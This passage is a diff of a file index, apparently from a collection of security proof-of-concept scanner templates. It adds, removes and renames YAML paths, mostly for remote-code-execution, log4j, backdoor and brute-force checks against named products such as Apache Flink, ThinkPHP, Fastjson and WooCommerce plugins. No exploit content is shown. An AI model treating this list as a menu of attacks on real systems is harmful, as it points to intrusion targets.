+./poc/python/jupyter-ipython-unauth-8402.yaml ./poc/python/jupyter-ipython-unauth-8404.yaml ./poc/python/jupyter-ipython-unauth-8405.yaml ./poc/python/jupyter-ipython-unauth.yaml @@ -81109,12 +81105,11 @@ ./poc/python/python-metrics-9746.yaml ./poc/python/python-metrics-9747.yaml ./poc/python/python-phish.yaml -./poc/python/python-scanner-9748.yaml +./poc/python/python-scanner.yaml ./poc/rabbitmq/rabbitmq-config-exposure.yml ./poc/rabbitmq/rabbitmq-dashboard-9776.yaml ./poc/rabbitmq/rabbitmq-dashboard-9777.yaml ./poc/rabbitmq/rabbitmq-dashboard-9778.yaml -./poc/rabbitmq/rabbitmq-dashboard-9779.yaml ./poc/rabbitmq/rabbitmq-dashboard.yaml ./poc/rabbitmq/rabbitmq-default-admin-9781.yaml ./poc/rabbitmq/rabbitmq-default-admin-9782.yaml @@ -81130,6 +81125,7 @@ ./poc/rabbitmq/rabbitmq-workflow-9787.yaml ./poc/rabbitmq/rabbitmq-workflow.yaml ./poc/rabbitmq/rabbitmq.yaml +./poc/redis/exposed-redis-7335.yaml ./poc/redis/exposed-redis-7336.yaml ./poc/redis/exposed-redis-7337.yaml ./poc/redis/exposed-redis-7338.yaml @@ -81336,13 +81332,15 @@ ./poc/remote_code_execution/apache-flink-unauth-rce-355.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-356.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-357.yaml +./poc/remote_code_execution/apache-flink-unauth-rce-358.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-359.yaml ./poc/remote_code_execution/apache-flink-upload-rce.yml ./poc/remote_code_execution/apache-httpd-cve-2021-41773-rce.yml +./poc/remote_code_execution/apache-httpd-rce-362.yaml ./poc/remote_code_execution/apache-httpd-rce-363.yaml ./poc/remote_code_execution/apache-httpd-rce.yaml ./poc/remote_code_execution/apache-nifi-rce.yaml -./poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml +./poc/remote_code_execution/apache-ofbiz-log4j-rce.yaml ./poc/remote_code_execution/apache-solr-91-rce.yaml ./poc/remote_code_execution/apache-solr-log4j-rce-372.yaml ./poc/remote_code_execution/apache-solr-log4j-rce.yaml @@ -81350,7 +81348,7 @@ ./poc/remote_code_execution/apache-spark-rce.yaml ./poc/remote_code_execution/apache-spark-shell-rce.yaml ./poc/remote_code_execution/apache-struts-s2-016-rce.yaml -./poc/remote_code_execution/api-vercel.yaml +./poc/remote_code_execution/api-vercel-510.yaml ./poc/remote_code_execution/avcon6-infomation-rce.yaml ./poc/remote_code_execution/azw-woocommerce-file-uploads-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/azw-woocommerce-file-uploads-ff9293ba28748efa2ab9a2fe77385468.yaml @@ -81497,7 +81495,7 @@ ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-5989797b3de4a7d046b22faa41f147a5.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce.yaml -./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml +./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml ./poc/remote_code_execution/cisco-rv-series-rce.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -81508,7 +81506,6 @@ ./poc/remote_code_execution/clockwatch-enterprise-rce-1008.yaml ./poc/remote_code_execution/clockwatch-enterprise-rce-1009.yaml ./poc/remote_code_execution/clockwatch-enterprise-rce-1010.yaml -./poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml ./poc/remote_code_execution/co2ok-for-woocommerce-111032b9706968c14c7d64c4f7dfc20e.yaml ./poc/remote_code_execution/co2ok-for-woocommerce-5a72e600d911398f0a295fcf76a6c0a4.yaml ./poc/remote_code_execution/co2ok-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -81521,7 +81518,8 @@ ./poc/remote_code_execution/co2ok-for-woocommerce-plugin.yaml ./poc/remote_code_execution/co2ok-for-woocommerce.yaml ./poc/remote_code_execution/code42-log4j-rce-1130.yaml -./poc/remote_code_execution/code42-log4j-rce-1132.yaml +./poc/remote_code_execution/code42-log4j-rce-1131.yaml +./poc/remote_code_execution/code42-log4j-rce.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-0524990b8a93f2e726c050d49aa0b22e.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-3574e2251d76d53bdcc685462fdb0300.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -81552,8 +81550,8 @@ ./poc/remote_code_execution/consul-rexec-rce.yml ./poc/remote_code_execution/consul-service-rce.yaml ./poc/remote_code_execution/consul-service-rce.yml +./poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1208.yaml -./poc/remote_code_execution/core-chuangtian-cloud-rce-1209.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1210.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1212.yaml @@ -81790,6 +81788,7 @@ ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic.yaml ./poc/remote_code_execution/elex-woocommerce-xss-7199.yaml ./poc/remote_code_execution/elex-woocommerce-xss-7200.yaml +./poc/remote_code_execution/elex-woocommerce-xss.yaml ./poc/remote_code_execution/elfinder-rce.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce-2a0fbc617737467a0c1230deb2588849.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce.yaml @@ -81854,9 +81853,9 @@ ./poc/remote_code_execution/exportfeed-list-woocommerce-products-on-ebay-store.yaml ./poc/remote_code_execution/extra-product-options-for-woocommerce-e27c95006efb42b161db220e372bc1d5.yaml ./poc/remote_code_execution/extra-product-options-for-woocommerce.yaml +./poc/remote_code_execution/eyou-email-rce-7378.yaml ./poc/remote_code_execution/eyou-email-rce-7379.yaml ./poc/remote_code_execution/eyou-email-rce-7380.yaml -./poc/remote_code_execution/eyou-email-rce-7381.yaml ./poc/remote_code_execution/eyou-email-rce.yaml ./poc/remote_code_execution/eyou-mail-moni-detail-rce.yaml ./poc/remote_code_execution/f5-tmui-cve-2020-5902-rce.yml @@ -81875,14 +81874,15 @@ ./poc/remote_code_execution/fastjson-1-2-24-rce-7400.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7401.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7403.yaml +./poc/remote_code_execution/fastjson-1-2-41-rce-7404.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7405.yaml +./poc/remote_code_execution/fastjson-1-2-42-rce-7407.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7409.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7411.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7413.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml -./poc/remote_code_execution/fastjson-1-2-47-rce-7416.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7417.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml @@ -81890,7 +81890,6 @@ ./poc/remote_code_execution/fastjson-1-2-62-rce.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7421.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7423.yaml -./poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce-1.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce-2.yaml @@ -81975,7 +81974,6 @@ ./poc/remote_code_execution/gitlab-rce-7691.yaml ./poc/remote_code_execution/gitlab-rce-7692.yaml ./poc/remote_code_execution/gitlab-rce-7693.yaml -./poc/remote_code_execution/gitlab-rce.yaml ./poc/remote_code_execution/gitlist-rce-cve-2018-1000533.yml ./poc/remote_code_execution/gitlistrce.yaml ./poc/remote_code_execution/giveaways-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -82017,7 +82015,7 @@ ./poc/remote_code_execution/hiboss-rce-7946.yaml ./poc/remote_code_execution/hiboss-rce-7947.yaml ./poc/remote_code_execution/hiboss-rce-7948.yaml -./poc/remote_code_execution/hiboss-rce-7949.yaml +./poc/remote_code_execution/hiboss-rce-7950.yaml ./poc/remote_code_execution/hide-shipping-method-for-woocommerce-2551a852a2322f801f9d791245c4c110.yaml ./poc/remote_code_execution/hide-shipping-method-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/hide-shipping-method-for-woocommerce.yaml @@ -82043,7 +82041,6 @@ ./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml -./poc/remote_code_execution/icewarp-webclient-rce.yaml ./poc/remote_code_execution/image-source-control-isc-1f038aef0dcbd62c1999c43ff0e6ea69.yaml ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml @@ -82067,7 +82064,6 @@ ./poc/remote_code_execution/jamf-log4j-jndi-rce-8212.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8213.yaml ./poc/remote_code_execution/jamf-log4j-jndi-rce-8214.yaml -./poc/remote_code_execution/jamf-log4j-jndi-rce.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway-2b946216639ed77b4eb9e56a3219058b.yaml ./poc/remote_code_execution/jazzcash-woocommerce-gateway.yaml ./poc/remote_code_execution/jeewms-dynamicDataSourceController-rce.yaml @@ -82165,7 +82161,6 @@ ./poc/remote_code_execution/lotuscms-rce-2.yaml ./poc/remote_code_execution/lotuscms-rce-8650.yaml ./poc/remote_code_execution/lotuscms-rce-8651.yaml -./poc/remote_code_execution/lotuscms-rce-8652.yaml ./poc/remote_code_execution/lotuscms-rce-8653.yaml ./poc/remote_code_execution/maccms-rce.yaml ./poc/remote_code_execution/maccms-rce.yml @@ -82192,6 +82187,7 @@ ./poc/remote_code_execution/metersphere-plugin-rce-8835.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8836.yaml ./poc/remote_code_execution/metersphere-plugin-rce-8837.yaml +./poc/remote_code_execution/metersphere-plugin-rce.yaml ./poc/remote_code_execution/mgb-opensource-guestbook.yaml ./poc/remote_code_execution/microblogrce.yaml ./poc/remote_code_execution/min-and-max-purchase-for-woocommerce-29c59921f159dd1fd640d027a39c2496.yaml @@ -82202,6 +82198,7 @@ ./poc/remote_code_execution/minmax-quantity-for-woocommerce.yaml ./poc/remote_code_execution/mirai-unknown-rce-8897.yaml ./poc/remote_code_execution/mirai-unknown-rce-8898.yaml +./poc/remote_code_execution/mirai-unknown-rce-8899.yaml ./poc/remote_code_execution/mobile-login-woocommerce-23d0bf81c74275c3e55e25a6c8aa8e5b.yaml ./poc/remote_code_execution/mobile-login-woocommerce-71c68dc9d2433d718771a35db7cc14f9.yaml ./poc/remote_code_execution/mobile-login-woocommerce-776ff600825d9dc7d0f61014766c27a4.yaml @@ -82210,6 +82207,7 @@ ./poc/remote_code_execution/mobile-login-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/mobile-login-woocommerce-plugin.yaml ./poc/remote_code_execution/mobile-login-woocommerce.yaml +./poc/remote_code_execution/mobileiron-log4j-jndi-rce-8903.yaml ./poc/remote_code_execution/mobileiron-log4j-jndi-rce-8904.yaml ./poc/remote_code_execution/mobileiron-log4j-jndi-rce-8905.yaml ./poc/remote_code_execution/mobileiron-log4j-jndi-rce-8906.yaml @@ -82293,6 +82291,7 @@ ./poc/remote_code_execution/ns-woocommerce-watermark.yaml ./poc/remote_code_execution/nsfocus-sas-rce-exec.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9170.yaml +./poc/remote_code_execution/nuuo-nvrmini2-rce-9171.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9172.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9173.yaml ./poc/remote_code_execution/nuuo-nvrmini2-rce-9174.yaml @@ -82306,8 +82305,8 @@ ./poc/remote_code_execution/opentsdb-rce-1.yaml ./poc/remote_code_execution/opentsdb-rce-2.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9341.yaml +./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9342.yaml ./poc/remote_code_execution/optilink-ont1gew-gpon-rce-9343.yaml -./poc/remote_code_execution/optilink-ont1gew-gpon-rce.yaml ./poc/remote_code_execution/oracle-commerce-cloud.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/order-and-inventory-manager-for-woocommerce-cb43a3033745f9235059b7d1b7a3d855.yaml @@ -82335,7 +82334,8 @@ ./poc/remote_code_execution/order-xml-file-export-import-for-woocommerce.yaml ./poc/remote_code_execution/oscommerce-rce-9405.yaml ./poc/remote_code_execution/oscommerce-rce-9406.yaml -./poc/remote_code_execution/oscommerce-rce-9407.yaml +./poc/remote_code_execution/oscommerce-rce-9408.yaml +./poc/remote_code_execution/oscommerce-rce.yaml ./poc/remote_code_execution/oscommerce-workflow.yaml ./poc/remote_code_execution/oscommerce.yaml ./poc/remote_code_execution/out-of-stock-display-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -82346,7 +82346,7 @@ ./poc/remote_code_execution/out-of-stock-display-for-woocommerce.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml ./poc/remote_code_execution/pagination-styler-for-woocommerce.yaml -./poc/remote_code_execution/panabit-sy_addmount-rce(1).yaml +./poc/remote_code_execution/panabit-sy_addmount-rce.yaml ./poc/remote_code_execution/pandorafms-cve-2019-20224-rce.yml ./poc/remote_code_execution/parcel-tracker-ecourier-102353dc8e1f02661d6e7f970ee16c34.yaml ./poc/remote_code_execution/parcel-tracker-ecourier-1fbda1a354e4e1e6f5f905808cc4736f.yaml @@ -82389,6 +82389,7 @@ ./poc/remote_code_execution/pdf-invoices-and-packing-slips-for-woocommerce.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce-9471.yaml +./poc/remote_code_execution/pdf-signer-ssti-to-rce-9472.yaml ./poc/remote_code_execution/pdf-signer-ssti-to-rce.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-7f5741480217fb4df85d3b4de3f502cb.yaml ./poc/remote_code_execution/perfect-woocommerce-brands-e32d6103a8131017699f2d0178c74f2a.yaml @@ -82408,6 +82409,7 @@ ./poc/remote_code_execution/phalcon-framework-source-9493.yaml ./poc/remote_code_execution/phalcon-framework-source-9494.yaml ./poc/remote_code_execution/phalcon-framework-source-9495.yaml +./poc/remote_code_execution/phalcon-framework-source-9496.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-5f600e44d5a9bae2880bbdac987c18c0.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-754324d17136d5a0b95bd48018ce3ad6.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce-a18b8eeee685e84b7ab5bc1637d15598.yaml @@ -82417,6 +82419,7 @@ ./poc/remote_code_execution/phone-orders-for-woocommerce-plugin.yaml ./poc/remote_code_execution/phone-orders-for-woocommerce.yaml ./poc/remote_code_execution/php-8.1.0-dev-rce-sqli.yaml +./poc/remote_code_execution/php-zerodium-backdoor-rce-9569.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9570.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9571.yaml ./poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml @@ -82599,9 +82602,10 @@ ./poc/remote_code_execution/quotes-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/remote_code_execution/quotes-for-woocommerce-plugin.yaml ./poc/remote_code_execution/quotes-for-woocommerce.yaml -./poc/remote_code_execution/qvisdvr-deserialization-rce-9772.yaml ./poc/remote_code_execution/qvisdvr-deserialization-rce-9773.yaml ./poc/remote_code_execution/qvisdvr-deserialization-rce-9774.yaml +./poc/remote_code_execution/qvisdvr-deserialization-rce-9775.yaml +./poc/remote_code_execution/qvisdvr-deserialization-rce.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce-5bd5aa842bdc4d50b077cba9da1f3c12.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/racar-clear-cart-for-woocommerce.yaml @@ -82610,7 +82614,6 @@ ./poc/remote_code_execution/random-sorting-order-for-woocommerce-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/remote_code_execution/random-sorting-order-for-woocommerce.yaml ./poc/remote_code_execution/rce-CVE-2021-21224.yaml -./poc/remote_code_execution/rce-cve-2021-41773.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9831.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9832.yaml ./poc/remote_code_execution/rce-shellshock-user-agent-9833.yaml @@ -82670,6 +82673,7 @@ ./poc/remote_code_execution/ruijie-networks-rce-9946.yaml ./poc/remote_code_execution/ruijie-networks-rce-9947.yaml ./poc/remote_code_execution/ruijie-networks-rce-9948.yaml +./poc/remote_code_execution/ruijie-networks-rce-9949.yaml ./poc/remote_code_execution/ruijie-networks-rce.yaml ./poc/remote_code_execution/ruijie-rg-eg-web-mis-rce.yaml ./poc/remote_code_execution/ruijie-uac-remote-rce.yaml @@ -82683,11 +82687,12 @@ ./poc/remote_code_execution/salesforce-aura-1.yaml ./poc/remote_code_execution/salesforce-aura-2.yaml ./poc/remote_code_execution/salesforce-aura-3.yaml -./poc/remote_code_execution/salesforce-aura-9981.yaml +./poc/remote_code_execution/salesforce-aura-9982.yaml ./poc/remote_code_execution/salesforce-aura-9983.yaml ./poc/remote_code_execution/salesforce-aura-9984.yaml ./poc/remote_code_execution/salesforce-aura-detect.yml ./poc/remote_code_execution/salesforce-aura-misconfig.yaml +./poc/remote_code_execution/salesforce-aura.yaml ./poc/remote_code_execution/salesforce-credentials-detect.yml ./poc/remote_code_execution/salesforce-login.yaml ./poc/remote_code_execution/salesforce-misconfiguration.yaml @@ -82696,6 +82701,7 @@ ./poc/remote_code_execution/samsung-wea453e-rce.yml ./poc/remote_code_execution/samsung-wlan-ap-rce-10004.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10005.yaml +./poc/remote_code_execution/samsung-wlan-ap-rce-10006.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10007.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml ./poc/remote_code_execution/samsung-wlan-ap-rce-10009.yaml @@ -82707,9 +82713,9 @@ ./poc/remote_code_execution/sangfor-BA-rce.yaml ./poc/remote_code_execution/sangfor-ad-login-rce.yaml ./poc/remote_code_execution/sangfor-ad-rce.yaml +./poc/remote_code_execution/sangfor-ba-rce(1).yaml ./poc/remote_code_execution/sangfor-ba-rce-10020.yaml ./poc/remote_code_execution/sangfor-ba-rce-10021.yaml -./poc/remote_code_execution/sangfor-ba-rce.yaml ./poc/remote_code_execution/sangfor-ba-rce.yml ./poc/remote_code_execution/sangfor-cphp-rce.yaml ./poc/remote_code_execution/sangfor-edr-cssp-rce.yaml @@ -82717,15 +82723,14 @@ ./poc/remote_code_execution/sangfor-edr-rce-10025.yaml ./poc/remote_code_execution/sangfor-edr-rce-10026.yaml ./poc/remote_code_execution/sangfor-edr-rce-10027.yaml +./poc/remote_code_execution/sangfor-edr-rce-10028.yaml ./poc/remote_code_execution/sangfor-edr-rce-10029.yaml -./poc/remote_code_execution/sangfor-edr-rce-10030.yaml ./poc/remote_code_execution/sangfor-edr-tool-rce.yaml ./poc/remote_code_execution/sangfor-edr-tool-rce.yml ./poc/remote_code_execution/sangfor-logcent-rce.yaml ./poc/remote_code_execution/sangfor-report-rep-login-rce.yaml ./poc/remote_code_execution/sangfor-vpn-supersession-rce.yaml ./poc/remote_code_execution/sangforrce.yaml -./poc/remote_code_execution/sap-netweaver-rce(1).yaml ./poc/remote_code_execution/saphali-woocommerce-lite-f1a8989f3685644493e1506c7b69f933.yaml ./poc/remote_code_execution/saphali-woocommerce-lite.yaml ./poc/remote_code_execution/sapido-router-rce.yaml @@ -82833,11 +82838,9 @@ ./poc/remote_code_execution/springboot-h2-db-rce-10456.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10457.yaml ./poc/remote_code_execution/springboot-h2-db-rce-10458.yaml -./poc/remote_code_execution/springboot-h2-db-rce.yaml ./poc/remote_code_execution/springboot-log4j-rce-10472.yaml ./poc/remote_code_execution/springboot-log4j-rce-10473.yaml ./poc/remote_code_execution/springboot-log4j-rce-10474.yaml -./poc/remote_code_execution/springboot-log4j-rce.yaml ./poc/remote_code_execution/springboot2.x_eureka_rce.yaml ./poc/remote_code_execution/springboot_eureka_rce.yaml ./poc/remote_code_execution/springcloud-function-spel-rce.yaml @@ -82904,7 +82907,7 @@ ./poc/remote_code_execution/swipehq-payment-gateway-woocommerce.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce-443842d1d8712ea7662492da3baca3c2.yaml ./poc/remote_code_execution/swipehq-payment-gateway-wp-e-commerce.yaml -./poc/remote_code_execution/symfonyrce.yaml +./poc/remote_code_execution/symfonyrce(1).yaml ./poc/remote_code_execution/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/sync-ecommerce-neo-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/remote_code_execution/sync-ecommerce-neo.yaml @@ -82928,22 +82931,23 @@ ./poc/remote_code_execution/thinkcmf-rce-10728.yaml ./poc/remote_code_execution/thinkcmf-rce-10729.yaml ./poc/remote_code_execution/thinkcmf-rce.yaml +./poc/remote_code_execution/thinkphp-2-rce-10738.yaml ./poc/remote_code_execution/thinkphp-2-rce-10739.yaml ./poc/remote_code_execution/thinkphp-2-rce-10740.yaml ./poc/remote_code_execution/thinkphp-2-rce-10741.yaml ./poc/remote_code_execution/thinkphp-30-rce.yaml ./poc/remote_code_execution/thinkphp-50-rce.yaml ./poc/remote_code_execution/thinkphp-501-rce-10742.yaml -./poc/remote_code_execution/thinkphp-501-rce.yaml +./poc/remote_code_execution/thinkphp-501-rce-10743.yaml ./poc/remote_code_execution/thinkphp-5010-rce.yaml ./poc/remote_code_execution/thinkphp-5022-5129-rce.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10745.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10746.yaml ./poc/remote_code_execution/thinkphp-5022-rce-10747.yaml +./poc/remote_code_execution/thinkphp-5023-rce-10748.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10749.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10750.yaml ./poc/remote_code_execution/thinkphp-5023-rce-10751.yaml -./poc/remote_code_execution/thinkphp-5023-rce.yaml ./poc/remote_code_execution/thinkphp-5024-5130-rce.yaml ./poc/remote_code_execution/thinkphp-controller-rce.yml ./poc/remote_code_execution/thinkphp-lang-rce.yaml @@ -82997,7 +83001,6 @@ ./poc/remote_code_execution/unifi-network-log4j-rce-10974.yaml ./poc/remote_code_execution/unifi-network-log4j-rce-10975.yaml ./poc/remote_code_execution/unifi-network-log4j-rce-10976.yaml -./poc/remote_code_execution/unifi-network-log4j-rce.yaml ./poc/remote_code_execution/uniview-isc-logreport-php-rce.yaml ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce-1bad351f445f2e54e7e634608cd598f9.yaml @@ -83008,10 +83011,9 @@ ./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce.yaml ./poc/remote_code_execution/vcenter-rce.yaml ./poc/remote_code_execution/vercel-detect.yaml -./poc/remote_code_execution/vercel-takeover-11001.yaml +./poc/remote_code_execution/vercel-takeover-11000.yaml ./poc/remote_code_execution/vercel-takeover.yaml ./poc/remote_code_execution/visual-tools-dvr-rce-11031.yaml -./poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml ./poc/remote_code_execution/visual-tools-dvr-rce.yaml ./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11033.yaml ./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11034.yaml @@ -83055,6 +83057,7 @@ ./poc/remote_code_execution/webui-rce-11172.yaml ./poc/remote_code_execution/webui-rce-11173.yaml ./poc/remote_code_execution/webui-rce-11174.yaml +./poc/remote_code_execution/webui-rce.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce-03810ee843c54e70aa66a159f989ab60.yaml ./poc/remote_code_execution/weight-based-shipping-for-woocommerce.yaml ./poc/remote_code_execution/wholesale-market-for-woocommerce-49f637412267dd9ff3581b0711c3545a.yaml @@ -83800,16 +83803,17 @@ ./poc/remote_code_execution/wordpress-emails-verification-for-woocommerce.yaml ./poc/remote_code_execution/wordpress-ext-mailpress-rce.yaml ./poc/remote_code_execution/wordpress-ext-mailpress-rce.yml -./poc/remote_code_execution/wordpress-rce-simplefilelist-11299.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11300.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11301.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11302.yaml +./poc/remote_code_execution/wordpress-rce-simplefilelist-11303.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist-11304.yaml ./poc/remote_code_execution/wordpress-rce-simplefilelist.yaml ./poc/remote_code_execution/wordpress-simplefilelist-rce.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11338.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml ./poc/remote_code_execution/wordpress-woocommerce-listing-11340.yaml +./poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-1.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11342.yaml ./poc/remote_code_execution/wordpress-woocommerce-sqli-11343.yaml @@ -83900,7 +83904,6 @@ ./poc/remote_code_execution/wp-woocommerce-quickbooks-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/remote_code_execution/wp-woocommerce-quickbooks.yaml ./poc/remote_code_execution/wp-xmlrpc-brute-force-11623.yaml -./poc/remote_code_execution/wp-xmlrpc-brute-force-11624.yaml ./poc/remote_code_execution/wp-xmlrpc-brute-force.yaml ./poc/remote_code_execution/wp-xmlrpc-bruteforce.yaml ./poc/remote_code_execution/xforwoocommerce-6cf1075ce9f91e03833516f283694012.yaml @@ -83910,18 +83913,18 @@ ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce.yaml ./poc/remote_code_execution/yapi-rce-11724.yaml -./poc/remote_code_execution/yapi-rce-11726.yaml +./poc/remote_code_execution/yapi-rce-11725.yaml ./poc/remote_code_execution/yapi-rce.yml ./poc/remote_code_execution/yarn-resourcemanager-rce-11735.yaml ./poc/remote_code_execution/yarn-resourcemanager-rce-11736.yaml ./poc/remote_code_execution/yarn-resourcemanager-rce-11737.yaml -./poc/remote_code_execution/yarn-resourcemanager-rce.yaml ./poc/remote_code_execution/yccms-rce.yaml ./poc/remote_code_execution/yccms-rce.yml ./poc/remote_code_execution/yealinkpreauthrce.yaml ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs-02a26657350b931c1f5ee83a424e363d.yaml ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs-294f45046fb020ee538eee2dd55090f7.yaml ./poc/remote_code_execution/yikes-inc-easy-custom-woocommerce-product-tabs.yaml +./poc/remote_code_execution/yisaitong-dataImport-rce.yaml ./poc/remote_code_execution/yisaitong-dataimport-rce.yaml ./poc/remote_code_execution/yith-advanced-refund-system-for-woocommerce-959b1069d80fdc3a44260ad71185acf0.yaml ./poc/remote_code_execution/yith-advanced-refund-system-for-woocommerce.yaml @@ -84235,7 +84238,6 @@ ./poc/remote_code_execution/yonyou-nc-bsh-servlet-bshservlet-rce.yml ./poc/remote_code_execution/yonyou-nc-bshservlet-rce.yaml ./poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml -./poc/remote_code_execution/yonyou-nc-cloud-rce.yaml ./poc/remote_code_execution/yonyou-nc-servlet-upload-rce.yaml ./poc/remote_code_execution/yotpo-reviews-for-woocommerce-58258843b571df0213f35ea9341a70e8.yaml ./poc/remote_code_execution/yotpo-reviews-for-woocommerce.yaml @@ -84270,6 +84272,7 @@ ./poc/ruby/rails6-xss-9798.yaml ./poc/ruby/rails6-xss-9799.yaml ./poc/ruby/rails6-xss-9800.yaml +./poc/ruby/rails6-xss.yaml ./poc/ruby/ruby-help-desk-5db1ed033cd24d9fe5ecb1550e63481d.yaml ./poc/ruby/ruby-help-desk.yaml 